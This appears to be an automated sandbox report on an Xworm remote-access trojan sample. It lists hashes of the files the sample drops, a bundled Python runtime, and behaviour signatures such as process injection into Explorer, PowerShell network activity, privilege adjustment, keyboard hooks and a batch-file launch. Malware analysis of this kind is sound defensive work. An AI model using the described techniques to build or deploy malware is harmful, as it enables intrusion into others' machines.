| SHA512 | 4ec54b09e2b209ddb9a678522bb451740c513f488cb27a0883630718571745141920036aebdb78c0b4cd783a4a6eecc937a40c6104e427512d709a634b412f60 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\Scripts\pip3.10.exe
| MD5 | ba23b0cbda2ceaa83a2e6af4971445cb |
| SHA1 | 7af61089f263592ca8e9c66606921fefe217d79a |
| SHA256 | cefec4eb45b156bb1a0228e1fe8b002a9324bd9e9208706aca539045385a372b |
| SHA512 | d2918c41122dac14a39b00e53ab9c1f48e40c0fc4ce0ee4853dc271ecf99b661a3a12bbeb338b3da74fe42ff107fe33c560584b33cf7c20990975fbc08dc3d36 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\Tools\pynche\__init__.py
| MD5 | 3d02598f327c3159a8be45fd28daac9b |
| SHA1 | 78bd4ccb31f7984b68a96a9f2d0d78c27857b091 |
| SHA256 | b36ae7da13e8cafa693b64b57c6afc4511da2f9bbc10d0ac03667fca0f288214 |
| SHA512 | c59c5b77a0cf85bb9fbf46f9541c399a9f739f84828c311ced6e270854ecce86d266e4c8d5aa07897b48ce995c3da29fea994e8cd017d48e5a4fab7a6b65e903 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe
| MD5 | b1e4a59f3f1c7b6f250319d58798d3b9 |
| SHA1 | c894fa0a49480be671f8e5209b96da1d3dfbeae1 |
| SHA256 | 0467df606d98305b25a040e051cf8876a553a61da1031e51e6e77b15fb18b964 |
| SHA512 | c573148efc2cf00d38859c87c23c2bd01eac0c85081f2c0dde65cf81f4ee3e069cc22f21601daa7ed02be3203d278f6ad5ec14361eeb31d7aebc10e29b963901 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\VCRUNTIME140.dll
| MD5 | f34eb034aa4a9735218686590cba2e8b |
| SHA1 | 2bc20acdcb201676b77a66fa7ec6b53fa2644713 |
| SHA256 | 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1 |
| SHA512 | d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af |
C:\Users\Admin\Downloads\qfv0ao\App\Python\python310.dll
| MD5 | e9c0fbc99d19eeedad137557f4a0ab21 |
| SHA1 | 8945e1811ceb4b26f21edcc7a36dcf2b1d34f0bf |
| SHA256 | 5783c5c5a3ffce181691f19d27de376a03010d32e41360b72bcdbd28467cfcc5 |
| SHA512 | 74e1289683642ae2bc3cf780a07af1f27fed2011ef6cc67380f9c066c59d17a2fb2394a45a5c6cd75dad812a61093fdbd0f2108925f5c58fc6644c1c98be5c0b |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\encodings\__init__.py
| MD5 | 7e6a62ef920ccbbc78acc236fdf027b5 |
| SHA1 | 816afc9ea3c9943e6a7e2fae6351530c2956f349 |
| SHA256 | 93cfd89699b7f800d6ccfb93266da4db6298bd73887956148d1345d5ca6742a9 |
| SHA512 | c883b506aacd94863a0dd8c890cbf7d6b1e493d1a9af9cdf912c047b1ca98691cfd910887961dd94825841b0fe9dadd3ab4e7866e26e10bfbbae1a2714a8f983 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\encodings\__pycache__\__init__.cpython-310.pyc
| MD5 | ad5d1f53daafa9f491e728f10b5e0fe4 |
| SHA1 | d2a5d70bc6f86460d0cc0688d0f3a28abad62417 |
| SHA256 | 561cedf822ccb12029e2377fae782fd93d1cb90450be123b1b7d015a848ee004 |
| SHA512 | 03143e8dc969e6704c83639431e4e1605508aafb91080e24fb3555aa3af22c66127d6c3159a441d2e069e0f52c5ff2b4dc1cf0d7dcb0f0150b37445d7e3faf0a |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\codecs.py
| MD5 | 6de7381a0ef9f457ba52900b6b12cbe4 |
| SHA1 | c155363d6b28d49dc9c8e9c32c6cd23136a12525 |
| SHA256 | a4e08d46b6af70fd90c9eb2d877745877a6f5ee0791a8f3f6c1d6651f3e8be08 |
| SHA512 | 7fa6c329e514512bb07012c6ca1edd84272ae806b7cad9f9bb5f39de58126a286b40f1450df4b3d0fdea1e0c71e438b976305ac07085cea02534912399c9a0f4 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\__pycache__\codecs.cpython-310.pyc
| MD5 | cf90c3ca8f6c395298f04f5ec397c3f8 |
| SHA1 | b963901af9540a8efd41ed1435844e80c2be1fd8 |
| SHA256 | 48c8d808ea730ef66bf36d14894a0d2ee6fe49ef0a7e10582f7b3427ede168c1 |
| SHA512 | 4b770321dcfef174b9937db6b85f4e92a5f78585cd79a4201ce1c898fb7688674139f42c0dc4be780a77a820abfc74261fe8e82f446abfa5b91855e87a28228b |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\encodings\aliases.py
| MD5 | ff23f6bb45e7b769787b0619b27bc245 |
| SHA1 | 60172e8c464711cf890bc8a4feccff35aa3de17a |
| SHA256 | 1893cfb597bc5eafd38ef03ac85d8874620112514eb42660408811929cc0d6f8 |
| SHA512 | ea6b685a859ef2fcd47b8473f43037341049b8ba3eea01d763e2304a2c2adddb01008b58c14b4274d9af8a07f686cd337de25afeb9a252a426d85d3b7d661ef9 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\encodings\__pycache__\aliases.cpython-310.pyc
| MD5 | d397333b70c9637999aa025cf2662c2b |
| SHA1 | c43b7af9e9ff2331dfe1f8edd78cd32e886dff90 |
| SHA256 | de236cc928884d6887d148cf68a363195f949d489817a6ffd7204fea46d95348 |
| SHA512 | d964c517607cc6e172846740cd1f3fc83aa31eff958651f182c9da1ec1a5157b2cbdf7b6a63017f4fcc84de032d33c25ce2d0930d8fc5f8edf636c94bac21dd3 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\encodings\utf_8.py
| MD5 | f932d95afcaea5fdc12e72d25565f948 |
| SHA1 | 2685d94ba1536b7870b7172c06fe72cf749b4d29 |
| SHA256 | 9c54c7db8ce0722ca4ddb5f45d4e170357e37991afb3fcdc091721bf6c09257e |
| SHA512 | a10035ae10b963d2183d31c72ff681a21ed9e255dda22624cbaf8dbed5afbde7be05bb719b07573de9275d8b4793d2f4aef0c0c8346203eea606bb818a02cab6 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\encodings\__pycache__\utf_8.cpython-310.pyc
| MD5 | a68f47b8d25c5e08f200b778e524934f |
| SHA1 | f944ea551036cc4a3bb1d5d1ac057c2ca95b90e5 |
| SHA256 | 7953cd9b21b813b7a50ef265f01a5f17bfa487ea0e44ccae5f951c8a4b32a434 |
| SHA512 | 7dccc9318045dbd8b5a3eb4629dcee239e5d383ee58843424fc9ce3bed46de4242dc311247e4f2ef6fbd578a9a0ed238b955b897dfca786661bf78bc4bc674ae |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\encodings\cp1252.py
| MD5 | 52084150c6d8fc16c8956388cdbe0868 |
| SHA1 | 368f060285ea704a9dc552f2fc88f7338e8017f2 |
| SHA256 | 7acb7b80c29d9ffda0fe79540509439537216df3a259973d54e1fb23c34e7519 |
| SHA512 | 77e7921f48c9a361a67bae80b9eec4790b8df51e6aff5c13704035a2a7f33316f119478ac526c2fdebb9ef30c0d7898aea878e3dba65f386d6e2c67fe61845b4 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\encodings\__pycache__\cp1252.cpython-310.pyc
| MD5 | c977473943979b8e760d6af6c0f0df4a |
| SHA1 | 5e747d69000e346b776507eb1b5169977e8bb52a |
| SHA256 | ca58aaf6812a7e94937035d508b4f247f804d287f456e003f5182aa6c167a384 |
| SHA512 | 71933db5ccadd06674d4334d978838f14dba864d4e408ad034af4274e662cb289502beee2ae25c763866b6967583142580488ac0e66673e268a9483fe72f4523 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\io.py
| MD5 | 99710b1a7d4045b9334f8fc11b084a40 |
| SHA1 | 7032facde0106f7657f25fb1a80c3292f84ec394 |
| SHA256 | fe91b067fd544381fcd4f3df53272c8c40885c1811ac2165fd6686623261bc5d |
| SHA512 | ac1b4562ed507bcccc2bdfd8cab6872a37c081be4d5398ba1471d84498c322dcaa176eb1dda23daaddd4cebfcd820b319ddcb33c3972ebf34b32393ad8bd0412 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\__pycache__\io.cpython-310.pyc
| MD5 | c59212da39129341431f2ad0921ed0c5 |
| SHA1 | 34e61f32880d979881dce697f7d3e6f22d0890a5 |
| SHA256 | 2df91515104ca068d45ebba604f2b877a00211e7a9f0f6ed8ef0f3ac7c675dad |
| SHA512 | 31d16777f8fd03420a86f1b63ec429ef5d3d75baefc942dd7f5f48329cb45b02e36d8f706a8a6d1e17ce1ee652f0d41d9e6a067117f95d8db1764ab5b858f26c |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\abc.py
| MD5 | 3a8e484dc1f9324075f1e574d7600334 |
| SHA1 | d70e189ba3a4cf9bea21a1bbc844479088bbd3a0 |
| SHA256 | a63de23d93b7cc096ae5df79032dc2e12778b134bb14f7f40ac9a1f77f102577 |
| SHA512 | 2c238b25dd1111ee37a3d7bf71022fe8e6c1d7ece86b6bbdfa33ee0a3f2a730590fe4ba86cc88f4194d60f419f0fef09776e5eca1c473d3f6727249876f00441 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\__pycache__\abc.cpython-310.pyc
| MD5 | 9e3c38d1f85f72098a98071d406961d4 |
| SHA1 | c51f2744c54e92eec5d12d7c48426bfe65466157 |
| SHA256 | f36215beaa5a0335db4efea4f42647744bd5b8cd5b10b2bd7b1184da303b18db |
| SHA512 | 5aaaa85041846004dd8ca4c5874969b09c9e966cf70ae21e36cc49a838a99630b3e23f8844af197614a40be207d7b266adee26e34634b0b995042589b5c42df6 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\site.py
| MD5 | 23cf5b302f557f7461555a35a0dc8c15 |
| SHA1 | 50daac7d361ced925b7fd331f46a3811b2d81238 |
| SHA256 | 73607e7b809237d5857b98e2e9d503455b33493cde1a03e3899aa16f00502d36 |
| SHA512 | e3d8449a8c29931433dfb058ab21db173b7aed8855871e909218da0c36beb36a75d2088a2d6dd849ec3e66532659fdf219de00184b2651c77392994c5692d86b |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\__pycache__\site.cpython-310.pyc
| MD5 | bad60a8aecd0d8846d9a67bf20816dab |
| SHA1 | 17a89c4d352322d47165e1cc8a1dfd9d57bf1884 |
| SHA256 | d7844c8a374abaea451650c8eeab2452b44152838dd4273a66e020f8bc68552e |
| SHA512 | 344b16b4b1c567dee5aa9206d9a2968cc5bfae5e19e6430dbfb429e7d367408c636f0110d20f0678dc1858cefd9b85344ee485804f014736125449ec6277d942 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\os.py
| MD5 | e654aa03ee2c56b13ba507f8d62fcc71 |
| SHA1 | c8686cb4dcb732df64a10ad0cf5ab8dc80b27195 |
| SHA256 | 06648014cceb10f5ed3379f3b280ff2a4dd13da8173c186591372a8d392da881 |
| SHA512 | 464e58436371935d47a92c61271a422b6a2393b476b2f1c2cd961ae979d54c607b3895d8c16dd053375bdcb2e285ab35681f023766692e38ee6e1112dcb35b23 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\__pycache__\os.cpython-310.pyc
| MD5 | e2d6446854177363e8383ad6ecffa03c |
| SHA1 | a776121c414fb849706c6bf96cb98f835977dd17 |
| SHA256 | 8608d8f8996c49616440145fb1d20d471e693b02d68f66d7e36574bb0d506351 |
| SHA512 | e90dce58dd886c3bcbff3f02ed4c3d02cf70648a69c195eac723139e02b67518ad39afee362753b5aa168d3fe6171c228027ba688f223124fa43dcd4e318519d |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\stat.py
| MD5 | 7a7143cbe739708ce5868f02cd7de262 |
| SHA1 | e915795b49b849e748cdbd8667c9c89fcdff7baf |
| SHA256 | e514fd41e2933dd1f06be315fb42a62e67b33d04571435a4815a18f490e0f6ce |
| SHA512 | 7ecf6ac740b734d26d256fde2608375143c65608934aa51df7af34a1ee22603a790adc5b3d67d6944ba40f6f41064fa4d6957e000de441d99203755820e34d53 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\__pycache__\stat.cpython-310.pyc
| MD5 | 8429c40b922be65d03d6d8d80efc51cc |
| SHA1 | 08fa9e67723baaefaa07156631a4aa7d879bca4e |
| SHA256 | 105dc5d7f41b884d9b95bc34e91e2c354f9064d3b13c875b2721cfa65804f8c0 |
| SHA512 | 704faa93d35bd5a54cf6b01a4d7c3e44ed36099d5c67aeedee3a4cd7d66cde9c3ec8db7852dfad15c94be0ada10884b6d54e479faff953e6d240661ee1cebcc6 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\__pycache__\_collections_abc.cpython-310.pyc
| MD5 | 229fea2ea1f2cc40b1f030c168331c67 |
| SHA1 | 61d6c587fc5b7298459e7b5c69d0d9e9056dfdf7 |
| SHA256 | ad96f24ad26d2acaf8601c422f1f57fc1d18672c8d60fe3392e0d1b110639bee |
| SHA512 | e97b8b069e2e7c8e172ae0723b8e480cd63f12bdd00dd594b83373a206dfc080151183ccfdef8d8df94733cd8251f1c6e851366dcdb3a9db4d23d4d91b11cd39 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\_collections_abc.py
| MD5 | db2cbca6915ff98ed99e76065209f9cc |
| SHA1 | e7d7c4c537d068c8ce9965778a89eb91a305632c |
| SHA256 | abb2dd4a901171949fae7c3a957da0acfd0408817ebf84bd21adfff47a2580b6 |
| SHA512 | 16e7369c603fd1f558f656403714d57422803513abbf8a02b8bcca3f5ad9c73141306efe4bd6b9d660e713fe9cf0575c79eb2ba35a97d4c6f2cc4c91541a5817 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\new.py
| MD5 | 59c51d4fd69fe3721314d8ead661c8b0 |
| SHA1 | dd1608a5c6d34eaf874b4eda11abf6c3555a8761 |
| SHA256 | 69a1d3e1a202f448443be5a3f41167220ff1203cd557fa050c0135220cb8a184 |
| SHA512 | e41983097fa3c6f1bb88c275e4f278931b4f27ffb4bd544440f0b6ad0e09116da52f108a8cdc68a5887fa873338e1ef3f1825ece11b13dafaf4cf14d41128062 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\site-packages\distutils-precedence.pth
| MD5 | c39367750a2ad85b290fa7595d4cc457 |
| SHA1 | 4e2b7b413113994e4730efe03e564a84cebe2d73 |
| SHA256 | 7ea7ffef3fe2a117ee12c68ed6553617f0d7fd2f0590257c25c484959a3b7373 |
| SHA512 | 40e5b4813f24601ad581c93fa0115454ef89e61f6b911644e3b89946280ff97cbd46ae00287d8dc71392ef6c940ebaa173d2e3c32df72f0aa27d65ed73fe37c1 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\python3.DLL
| MD5 | 704d647d6921dbd71d27692c5a92a5fa |
| SHA1 | 6f0552ce789dc512f183b565d9f6bf6bf86c229d |
| SHA256 | a1c5c6e4873aa53d75b35c512c1cbadf39315deeec21a3ada72b324551f1f769 |
| SHA512 | 6b340d64c808388fe95e6d632027715fb5bd801f013debaaa97e5ecb27a6f6ace49bf23648517dd10734daff8f4f44969cff2276010bf7502e79417736a44ec4 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\DLLs\_ctypes.pyd
| MD5 | 3fc444a146f7d667169dcb4f48760f49 |
| SHA1 | 350a1300abc33aa7ca077daba5a883878a3bca19 |
| SHA256 | b545db2339ae74c523363b38835e8324799720f744c64e7142ddd48e4b619b68 |
| SHA512 | 1609f792583c6293abddf7f7376ffa0d33a7a895de4d8b2ecebaede74e8850b225b3bf0998b056e40e4ebffb5c97babccf52d3184b2b05072c0dbb5dcb1866f8 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\__pycache__\types.cpython-310.pyc
| MD5 | 7e1736a4d89211d73418998769e5dc5d |
| SHA1 | a94399fefa56ad6c5addee4b7e4ad3a275fcbbbe |
| SHA256 | bd326155219a25464e451214dbb6da3145529cc065036833e6139645f418e34a |
| SHA512 | beea47b7660146002228b9f1662278a06bcb4d48feff9bd16792a23ed633337be49900be786527f899247d672150b3175c4c34ae28ea59d4a08b4c79576523d2 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\types.py
| MD5 | c58c7a4ee7e383be91cd75264d67b13b |
| SHA1 | 60914b6f1022249cd5d0cf8caa7adb4dcf34c9ea |
| SHA256 | 0d3a1a2f8f0e286ad9eadbb397af0c2dc4bef0c71a7ebe4b51ded9862a301b01 |
| SHA512 | 9450e434c0d4abb93fa4ca2049626c05f65d4fb796d17ac5e504b8ec086abec00dcdc54319c1097d20e6e1eec82529993482e37a0bf9675328421f1fa073bf04 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\ctypes\__pycache__\__init__.cpython-310.pyc
| MD5 | 459f7e243a1a87ca4f5c31540f8aaf4d |
| SHA1 | 6ae3a5e6fbbc8e6994a6abe51ef7fb0dbf05fce8 |
| SHA256 | ba536c310e59cf50b2317c1b6fb57c773e3cd5e9dbc46a8dc726e99e7dc96995 |
| SHA512 | be028317eba8feeb9848e95c89c3744498923751b775185561492a2c034060bf1118cf6560246e186ebee87edb2243fefdebc1a80d9d468e1ced44c5272db467 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\ctypes\__init__.py
| MD5 | 4011bd449adc4f81a3c2471d506f013d |
| SHA1 | 917020bd87db0a002cd9fe3a018bcf235b7f4748 |
| SHA256 | 554dcfd54e9d080fb9157bed5323c74f2709982b1e5b64896b85164a0b983f57 |
| SHA512 | b04272d4bb930a11c80bb78992dfb7d7b0a9dabf665179fd56ee9e168116b3d999ec18c513626bdf23f23dcc5a581a4499fb67a43d6823d911fbf4b78ac854bb |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\__pycache__\_sitebuiltins.cpython-310.pyc
| MD5 | 56b7ab2668dbaa099f10e532ff2c15ec |
| SHA1 | 19dbbbdda57f313b9c33314589d07dfb07d5dfaa |
| SHA256 | 8ee72bb1626df1dff13d7e587e8d736895e9f6c280c24c7c8a3106150a686eac |
| SHA512 | 72127ef9d90c2b2b2c0e604d9dffb0175463289a27e5e8f2da9d2f1e28dbfecf7ce08b99f3ff03eeac7b9d778f41ee44404b4e07e4e3865c088b05735e03eea1 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\_sitebuiltins.py
| MD5 | 2e95aaf9bd176b03867862b6dc08626a |
| SHA1 | 3afa2761119af29519dc3dad3d6c1a5abca67108 |
| SHA256 | 924f95fd516ecaea9c9af540dc0796fb15ec17d8c42b59b90cf57cfe15962e2e |
| SHA512 | 080495fb15e7c658094cfe262a8bd884c30580fd6e80839d15873f27be675247e2e8aec603d39b614591a01ed49f5a07dd2ace46181f14b650c5e9ec9bb5c292 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\__pycache__\genericpath.cpython-310.pyc
| MD5 | 9f51f01011c5a6433fdfe6cd74efc7dc |
| SHA1 | 734fa5a598d8c83b3bd6815c647c94cdc9651b7f |
| SHA256 | 86cde33bfb8a6b6d45afc7e47006b5078fa1b3c374be8085e812af1d99eb23fe |
| SHA512 | 7b0a1019afbbf1ea9b9c246ef60c326e0b59e8fff63e63c3b285c5685b49eb916701de98014a54cfa558fe07b1bfb2991eb86e3635344de186bcd6b8af8f6b11 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\genericpath.py
| MD5 | 5ad610407613defb331290ee02154c42 |
| SHA1 | 3ff9028bdf7346385607b5a3235f5ff703bcf207 |
| SHA256 | 2e162781cd02127606f3f221fcaa19c183672d1d3e20fdb83fe9950ab5024244 |
| SHA512 | 9a742c168a6c708a06f4307abcb92cede02400bf53a004669b08bd3757d8db7c660934474ec379c0464e17ffd25310dbab525b6991cf493e97dcd49c4038f9b7 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\__pycache__\ntpath.cpython-310.pyc
| MD5 | 9c5e2ac6cfb3bc4d2c6421005d0c326c |
| SHA1 | a976df2fc586e881daec09563c35149bf82a7768 |
| SHA256 | 7d3ba0230c8abafd74fc1b115065b173099225909254f07637f2f334f46a4dcb |
| SHA512 | ead934db2c689688dd063534713ecb433f85b3e761665ebbf60abf5cf2a955f3b74bc328b59a175f08c47ff3683eda3241e03754ae4f1454fc3f9f6b4e5cfed4 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\ntpath.py
| MD5 | 8f06a8f5541141ed092853adf7b9c471 |
| SHA1 | 84d3f6653d6a6c2eef8c7127fa2f76c43d010742 |
| SHA256 | c2d2aae57f490786fbded651e1220413570eb1e98fef2c1f0bdd6a0f712400b8 |
| SHA512 | ab7cab59b4d76400b1d265df552ff7d77be50cfe0ed537887b2dad0d64bc4fe68e9006bc5f736a055a923a8073ea7874a2cc93a5007cc801e5549b9e394e679a |
C:\Users\Admin\Downloads\qfv0ao\App\Python\DLLs\libffi-7.dll
| MD5 | eef7981412be8ea459064d3090f4b3aa |
| SHA1 | c60da4830ce27afc234b3c3014c583f7f0a5a925 |
| SHA256 | f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081 |
| SHA512 | dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\ctypes\_endian.py
| MD5 | 017e36585911b8e46b02b637521e5b5c |
| SHA1 | 73363c9ff4bdfb489732376832b1f450645e21c7 |
| SHA256 | 48acc287ecdeb183631cabf97df977af3f05e081fce79a53c35b6078561f7c50 |
| SHA512 | 7e4361b80483cd32e88a6c07a1f4310aa4aff7857045d0879a6cb25c56f7e4c6de62017f7eac40b12ea67d94a2ef0fcdcac20c14eb2b22bc3a298bf35e5aeec1 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\__pycache__\struct.cpython-310.pyc
| MD5 | 131fbd606926f1362277283d7c225d76 |
| SHA1 | 95c75e45f2774729c03928268e2b9fb4f3d7df24 |
| SHA256 | 2dd58db54a7515cb3be61c9896d5469bc9a637af88cf10a8921853e035b57017 |
| SHA512 | e44ad00a35709c4155637d843c96f6d5b79cebfc4b39630a7a57f5b649f8e798e7e23784da5c4f6340eef2a8c2efae313054eb125897c1c2e722d19aa96be3f8 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\struct.py
| MD5 | 5b6fab07ba094054e76c7926315c12db |
| SHA1 | 74c5b714160559e571a11ea74feb520b38231bc9 |
| SHA256 | eadbcc540c3b6496e52449e712eca3694e31e1d935af0f1e26cff0e3cc370945 |
| SHA512 | 2846e8c449479b1c64d39117019609e5a6ea8030220cac7b5ec6b4090c9aa7156ed5fcd5e54d7175a461cd0d58ba1655757049b0bce404800ba70a2f1e12f78c |
memory/5324-15297-0x0000014BD3310000-0x0000014BD331F000-memory.dmp
memory/5324-15298-0x0000014BD4E40000-0x0000014BD4E4E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 69cf8e113125581fd4c5be488696e0d2 |
| SHA1 | cf7d8200877e70f775bdc52a383b8244f094bd9b |
| SHA256 | c221fa25b5251febc7e2fed0de006cfd54cbdfcc1df7d7b3d6efe3337a3aceac |
| SHA512 | ebe84cbf99f5618e0c4d786525e7cc09e0a699316efd8fef184ec0b00acd2eb26064135942f2daba2724740ada6316b8eedf2f7fa6fc948ef67cc70f84fcafb4 |
memory/5324-15322-0x0000014BD4E90000-0x0000014BD4E9A000-memory.dmp
memory/5324-15323-0x0000014BEDAF0000-0x0000014BEDC99000-memory.dmp
memory/5324-15324-0x0000014BEDAF0000-0x0000014BEDC99000-memory.dmp
memory/5324-15325-0x0000014BEDAF0000-0x0000014BEDC99000-memory.dmp
memory/5324-15326-0x0000014BEDAF0000-0x0000014BEDC99000-memory.dmp
memory/5324-15327-0x0000014BEDAF0000-0x0000014BEDC99000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-10 13:16
Reported
2024-06-10 13:21
Platform
win11-20240426-en
Max time kernel
300s
Max time network
294s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1976 created 3300 | N/A | C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe | C:\Windows\Explorer.EXE |
| PID 1976 created 3300 | N/A | C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe | C:\Windows\Explorer.EXE |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\bas.bat"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
